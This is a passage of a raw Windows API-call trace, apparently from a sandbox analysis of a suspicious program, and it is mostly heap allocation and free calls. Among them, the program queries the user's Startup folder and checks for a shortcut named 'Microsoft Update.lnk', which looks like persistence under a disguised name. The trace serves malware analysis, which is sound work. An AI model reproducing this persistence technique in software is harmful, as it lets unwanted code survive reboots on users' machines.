lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0249.916] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0249.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0249.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0249.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0249.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0249.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0249.917] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0250.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0250.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0250.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0250.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0250.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0250.024] FreeLibrary (hLibModule=0x76240000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0250.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0250.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0250.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0250.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0250.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0250.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0250.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0250.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0250.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0250.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0250.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0250.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0250.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0250.028] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0250.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0250.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0250.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0250.029] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0250.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0250.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0250.029] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0250.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0250.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0250.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0250.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0250.031] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0250.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0250.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0250.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0250.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0250.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0250.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0250.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0250.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0250.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0250.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0250.109] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0250.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 